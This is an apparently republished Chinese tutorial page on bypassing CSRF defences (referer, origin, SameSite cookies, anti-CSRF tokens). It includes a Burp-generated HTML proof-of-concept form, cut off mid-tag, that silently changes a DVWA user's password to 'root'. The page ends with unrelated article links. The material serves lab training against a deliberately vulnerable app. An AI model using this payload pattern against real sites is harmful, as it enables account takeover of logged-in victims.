当前位置: 首页 > news >正文

CSRF绕过

目录

1. 检查referer

referer绕过

2. 检查origin

3. Cookie检查

SameSite

持久性验证

4. Token检查

检测token编码类型,尝试篡改token

绕过token检测

在页面上尝试修改密码, 观察请求的格式.

绕过思路

1. 编写一个js脚本完成以下的任务:

2. 引诱登录的用户触发这个js脚本就可以完成修改密码的攻击.


1. 检查referer

设置一个虚假的referer 与 源请求头均请求后做比较,如果返回的长度相同,那么网站在处理HTTP请求之前实际上不会验证referer

referer绕过

当使用一个普通的表单类型的钓鱼链接时, 比如 http://192.168.112.202/csrf.html

<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('', '', '/')</script><form action="http://192.168.112.200/DVWA-master/vulnerabilities/csrf/"><input type="hidden" name="password&#95;new" value="root" /><input type="hidden" name="password&#95;conf" value="root" /><input type="hidden" name="Change" value="Change" /><input type="
http://www.lryc.cn/news/382584.html

相关文章:

  • 如何处理Java中的BufferOverflowException异常?
  • XMLTomcatHttp协议
  • Lua优化技巧
  • 探索CSS中的cursor鼠标属性
  • 图象去噪1-使用中值滤波与均值滤波
  • 微软Edge浏览器全解析
  • Windows操作系统安装mysql数据库(zip安装包)
  • 什么是仓颉编程语言?
  • ONLYOFFICE8.1-------宝藏级别桌面编辑器测评
  • 微信小程序笔记 七!
  • GPT-5的即将登场:新一代大语言模型的无限可能
  • 微信小程序的常用事件的用法
  • 前端 CSS 经典:保持元素宽高比
  • MES工业一体机的自动化控制技术
  • 三品PDM电子行业解决方案介绍 电子企业PDM应用效果
  • 模拟面试之外卖点单系统(高频面试题目mark)
  • SwiftUI 6.0(iOS 18/macOS 15)关于颜色 Color 的新玩法
  • C++核心编程运算符的重载
  • 雷达标定与解析
  • 养殖自动化温控系统:现代养殖场的智能守护神
  • 用python打印——九九乘法表2
  • 如何系统学习机器学习?
  • Qt:1.杂谈
  • AI视频模型Sora核心功能以及应用场景
  • 面试-细聊synchronized
  • AI降重新突破:chatgpt降重工具在学术论文中的应用与效果
  • Spring学习02-[Spring容器核心技术IOC学习]
  • 2024上海CDIE 参展预告 | 一站式云原生数字化平台已成趋势
  • 高考专业组 07组 08组 武汉大学
  • 解析JavaScript中逻辑运算符和||的返回值机制